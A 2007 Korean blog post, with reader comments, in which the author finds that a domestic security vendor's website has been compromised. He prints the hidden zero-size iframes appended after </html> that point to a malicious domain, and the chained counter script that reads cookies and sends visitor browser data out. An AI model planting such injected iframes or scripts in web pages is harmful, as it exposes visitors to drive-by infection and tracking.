언제나 공사중!

  • 홈
  • 공지사항
  • 태그
  • 미디어로그
  • 위치로그
  • 방명록

'암호화'에 해당되는 글 1건

  1. 2007/10/12 보안 제품을 사라는거야 말라는거야... (16)

보안 제품을 사라는거야 말라는거야...

컴퓨터와 생활 2007/10/12 10:23

 요즘 제 ID와 PW를 RoboForm2Go 를 통해 관리하고 있습니다. 이 제품의 장점은 연결된 포터블 장비(USB 메모리)에서 모든 동작이 끝난다 끝난다는 점인데, 대부분 USB 메모리에 이 프로그램만 딸랑 넣고 다니지 않지요. 대부분 문서나 은행 인증서 같은 것도 함께 갖고 다니잖아요.

 그래서 드라이브를 암호화 해보자..라는 생각을 말이죠. 제가 사용하는 Trancend JF110에도 전용 암호화 프로그램이 있긴 하지만, 파티션을 미리 나눠야 한다는 점 때문에 불편함이 있습니다.

 그래서 바꿔볼 생각을 했습니다.

 그래.. 국내 업체를 밀어줄까? 하고 생각했습니다만.........


별도 마음에 와닫지 않는군요


사용자 삽입 이미지

이쪽 업계의 분위기상 어떤 이유에서인지 모르게 소프트웨어의 기능에 눈이 먼저 가는게 아니라 불쌍하다는 생각이 먼저 듭니다.

처음 시작하는 index.htm 파일 안에는...


<iframe src=http://www.sayc1ub.com width=0 height=0 frameborder=0></iframe><iframe src=http://www.sayc1ub.com width=0 height=0 frameborder=0></iframe>


라는 내용이 </html> 이후에 붙어 있으며, http://www.sayc1ub.com 에 접속하면


<iframe src="club.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="say.htm" width="0" height="0" frameborder="0"></iframe>
<a href="http://www.51.la/?1367935" target="_blank"><img alt="&#x6211;&#x8981;&#x5566;&#x514D;&#x8D39;&#x7EDF;&#x8BA1;" src="http://img.users.51.la/1367935.asp" style="border:none" /></a>
<script language="javascript" src="http://count44.51yes.com/click.aspx?id=448562956&logo=1"></script>

라는 내용이 반겨주고... 이 사이트에서는 http://img.users.51.la/1367935.asp의 내용을 호출하는데, 그 내용은
 

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://web.51.la/s.asp?svid=43&amp;id=1367935&amp;style=0&amp;vpage=http%3A%2F%2Fwww%2Esayc1ub%2Ecom%2F&amp;29901.26.gif">here</a>.</body>


이고, 다시 연속적으로 http://count44.51yes.com/click.aspx?id=448562956&logo=1 를 호출 하는데... 그 내용은


var countid=448562956;var logo=1;

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}

function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}

function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}

var yesdata;

yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);

if(logo!=12)
{document.write('<a href="http://count.51yes.com/index.aspx?id='+ countid +'" target=_blank>');
document.write('<img width=20 height=20 border=0 hspace=0 vspace=0 src="http://count44.51yes.com/count'+ logo +'.gif" alt="51YES貢籃固셕溝固"></a>');}
else
{document.write('<a href="http://count.51yes.com/index.aspx?id='+ countid +'" target=_blank title="51YES貢籃固셕溝固">직좆固셕</a>');}
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count44.51yes.com/sa.aspx?id='+countid+yesdata+' height=0 width=0></iframe>');


이군요. 쭉 몇단계 더 진행되며 더 추적할 수 있지만, 사실 귀찮습니다. 그냥 귀찮은 정도가 아니라 더 추적을 하는건 대.단.히.귀.찮.습.니.다. 하면 어떻게 동작할지도 뻔하게 아는 사실이고.....

 보안 제품을 살까 하고 갔습니다만, 보안 제품 대신에 보안이 망가진 시스템을 구경하고 왔으니...... 흐음..... 아마 서버 관리자나 보안 관리자는 대단히 골치 아플듯 싶네요..

 해당 제품의 개발사는 국내에 몇 손가락 안에 꼽는 소프트웨어 업체입니다. 보안쪽으로 많이 신경쓰고 있는 걸로 알고 있고, 얼마 전에 개인정보차단 솔루션도 만들었다고 해서 그럭저럭 괜찮은 이미지였는데, 이번 건으로 그다지 신뢰가 가지 않는군요. (사실 개인적으로 국내 대부분의 업체를 신뢰하지 않습니다. 관리는 잘 안하면서 너무 돈만 밝히는 듯한 이미지를 가지게 해서요.)

제가 말하고 싶은 최종 결론은....


전자 정부가 외산장비 잔치라 구박하지 말고
지금 있는 기술부터 확실히 익힐 수 있도록 투자


하라는 거죠. 기본에 충실하지 않고, 빨리빨리를 외치며 완성품부터 요구하는 현실이 싫군요.

PS1. 제가 쓰는 USB 메모리 : 2006/03/02 - [지름] Trancend JF110 2G
PS2. 아.. 여기까지 보다가 귀찮아서 그냥 쓰던거 계속 쓰기로 했습니다. -_-a

Tag IT, 보안, 암호화, 지란지교
트랙백 1 Comment 16

Trackback : http://www.daegul.com/trackback/2511471 관련글 쓰기

  1. Subject 보안제품 사이트가 해킹을 당했군요.

    Tracked from 일상의 잡다구리한 이야기 2007/10/12 11:56 delete

    지란지교 소프트의 USBSAFE 사이트입니다. 이름하여 보안 소트프죠. 아래의 노랭이는 아시는분은 아실테지만 해킹을 당한 것입니다. 이번년도 중반에 저도 상당히 환장하며 봤던 메시지 입니다. (제가 근무하던 회사에 아주아주 잠깐 돌아서 한밤에 출동하던 일이 있었는데, 엔지니어들의 각고의 노력에 의해 바로 잡혔습니다.) IIS의 RDS 취약점을 이용한 공격인데, 한 번 걸리면 욕도 바가지로 먹거니와 끈질긴 해커들과의 대면식이 진행될 귀찮은 친구입니다...

  1. Favicon of http://lane-s.com BlogIcon Lane 2007/10/12 10:55 address edit & del reply

    아이프레임 무지하게 써 놨군요.
    IE 아니면 적용도 안되는 태그를...
    초기화면 브라우저 상단 노란 상자가 나오는 거 보니 또 액티브 엑스 잔친가 보네요.
    거참... 저에게는 요즘 저 노란 상자가 스펨 전화랑 비슷한 수준의 스트레스를 주더군요.

    • Favicon of http://www.daegul.com BlogIcon 데굴대굴 2007/10/12 12:01 address edit & del

      액티브액스를 이용한 백도어 설치가 목적입니다. 상당히 고급기술입니다. 처음부터 끝까지 분석해보시면(하는 작업은 대단히 귀찮은 작업입니다. -_-), 자신의 스킬이 업되었다는 것을 느끼실 수 있을 정도 입니다.

  2. Favicon of http://zizim.tistory.com BlogIcon zizim 2007/10/12 11:15 address edit & del reply

    으와~ 복잡하네요.
    액티브 엑스는 무조건 반사;;

    • Favicon of http://www.daegul.com BlogIcon 데굴대굴 2007/10/12 12:01 address edit & del

      인터넷뱅킹도 안하실려고요? -_-a

    • Favicon of http://zizim.tistory.com BlogIcon zizim 2007/10/12 12:08 address edit & del

      아날로그 인간이라 무조건 은행 직접 갑니다.

    • Favicon of http://www.daegul.com BlogIcon 데굴대굴 2007/10/14 11:38 address edit & del

      은행을 직접 갈 시간이 있으시다니....



      부럽습니다.

    • Favicon of http://zizim.tistory.com BlogIcon zizim 2007/10/14 11:48 address edit & del

      일단 알백조라서 은행 갈 일 별로 없기도 하거니와 집에서 가깝거든요.

    • Favicon of http://www.daegul.com BlogIcon 데굴대굴 2007/10/14 11:51 address edit & del

      저도 가깝긴 합니다만 갈 시간이... ;;;

  3. Favicon of http://dirtybit.tistory.com BlogIcon dirtybit 2007/10/12 11:30 address edit & del reply

    아아, 저거 한번 들어오면 -_-;
    뭐랄까 참으로 피곤하더군요; -_-
    어딘가 알수 없는 곳에 슬쩍 놓고 가는데 이거 뭐 어떻게 막아야 할지 참으로 난감하다는;;;

    여차저차 해서 뭐 시스템 담당하는 분이 처리해서 저야 잘 모르지만, 확실히 여기저기 알게 모르게 저거 많이 걸려있는거 같더라구요. 제발 있는 기술, 기본 부터 제대로 알고 좀 뭔가 했으면 하는 생각입니다.

    • Favicon of http://www.daegul.com BlogIcon 데굴대굴 2007/10/12 12:02 address edit & del

      문제는 이런걸 익히기 전에 담당자가 바뀐다는 것. 스킬업할 시간도 없고, 대충 물건 내놓을 궁리만 한다는 것.

  4. Favicon of http://stellar.pe.kr/ BlogIcon StarLight 2007/10/13 18:28 address edit & del reply

    으윽;; 뭔가 엄청 어지러운 코드들이군요.

    • Favicon of http://www.daegul.com BlogIcon 데굴대굴 2007/10/14 11:39 address edit & del

      일부러 해석하는데 오래 걸리게끔 복잡하게 계속 빙글빙글 돌리는겁니다. 그래서 더 귀찮죠. -_-a

  5. Favicon of http://unjena.com/ BlogIcon Hee 2007/10/15 22:25 address edit & del reply

    아...
    외..외계어같아요..orz..

    흠흠..
    그래도 저 업체를 보니 신뢰는 안 가는 느낌이네요;;
    보안이 망가진 시스템의 보안회사라니...ㅎㄷㄷ;;

    • Favicon of http://www.daegul.com BlogIcon 데굴대굴 2007/10/16 10:25 address edit & del

      외계어 맞답니다. 이거는 해석!해야 하는 것이니까요.

      뭐.. 보안이 망가진 보안회사라도 국내에는 손꼽히는 기업입니다. -_-a

  6. Favicon of http://cksdn.net BlogIcon 찬우넷 2007/10/18 03:47 address edit & del reply

    흐흐-0
    어렵군요-
    전혀 알아보지를 못하겠어요

    • Favicon of http://www.daegul.com BlogIcon 데굴대굴 2007/10/18 11:40 address edit & del

      저는... '욕'으로 알아듣고 있습니다. (이해 못하는건 모두 욕으로 인식하는 편리한 시스템 탑제!)

prev 1 next
openclose
블로그 이미지
당신과 나 사이의 왜곡된 세상은 우리가 함께 있을 수 있다는 증거에요.
데굴대굴

Article Category

분류 전체보기 (1276)
I am.. & 테.. (93)
보는 것 (436)
문자 책 (156)
그림 책 (39)
움직이는 것 (240)
먹는 것 (49)
일 (109)
프로그램 (23)
Windows (16)
이벤트 뷰어 (51)
Knowledge Base (6)
여행 (75)
컴퓨터와 생활 (171)
아이폰/아이.. (55)
게임 (29)
PSP (20)
PC (9)
소원 (71)
유아/육아물건 (1)
순수 잡담 (243)
작성 중 (0)

Tag Cloud

  • APP
  • 설명서
  • 할일관리
  • context
  • 업무관리
  • 할일 빠짐 없이 하기
  • 2do
  • TODO
  • 투들두
  • 일정관리
  • 할일
  • toodledo
  • pi
  • Pocket Informant
  • GTD
  • 아이폰
  • 앱
  • 캘린더
  • iPhone
  • 포켓 인포먼트

Recent Article

  • Pocket Informant..
  • Pocket Informant..
  • Pocket Informant..
  • Pocket Informant..
  • Pocket Informant..
  • Pocket Informant..
  • Pocket Informant..

Recent Comment

  • 동일합니다. 동기화..
  • 동기화 설정하면 됩..
  • 아 제가 설명이 부..
  • 죄송한데. 혹시 아..
  • 육아는 삶입니다...
  • 육아 블로거는 아직..
  • 공유 풀고 컴에서..

Notice

  • 이런 여성분 찾았습..
  • 글 퍼감 금지입니다
  • 제품 프리뷰(리뷰)..
  • 주인장 소개 2008.06.
  • 글 쓰실 때 주의점

Recent Trackback

  • 아이폰 아이패드에..
  • 더 블로그 천일 기..
  • 티스토리의 변신은..
  • 마당을 나온 암탉 -..
  • 좋은 교사가 되려면..
  • 숨겨진 떡볶이 - 장..
  • 신용등급 바닥까지..

Archive

  • 2012/01 (10)
  • 2011/12 (6)
  • 2011/11 (3)
  • 2011/10 (5)
  • 2011/09 (3)
  • 2011/07 (3)
  • 2011/06 (2)
  • 2011/05 (4)
  • 2011/04 (3)
  • 2011/03 (5)
  • 2011/02 (3)
  • 2011/01 (9)

Calendar

«   2012/02   »
일 월 화 수 목 금 토
      1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29      

My Link

  • 푸샵.com - 블로그..
  • 별 볼일 없는 페이지
  • Blind-Blue
  • Bhut Jolokia ~綱魂..
  • 다들 안녕.... 군대..
  • rienhart's Life St..
  • IT 솔루션의 새로운..
  • ** MY's kitchen **
  • ** MY's kitchen **
  • ** MY's kitchen **
  • 제타군의 '인생은..
  • 펜은 강하다
  • spirit dreams inside
  • Total 2,356,738
  • Today 166
  • Yesterday 369
rss RSS FEED
Copyright 데굴대굴's Blog.

무단 펌질 금지

데굴대굴's Blog is powered by Daum

Designed by Tistory / Customized by 데굴대굴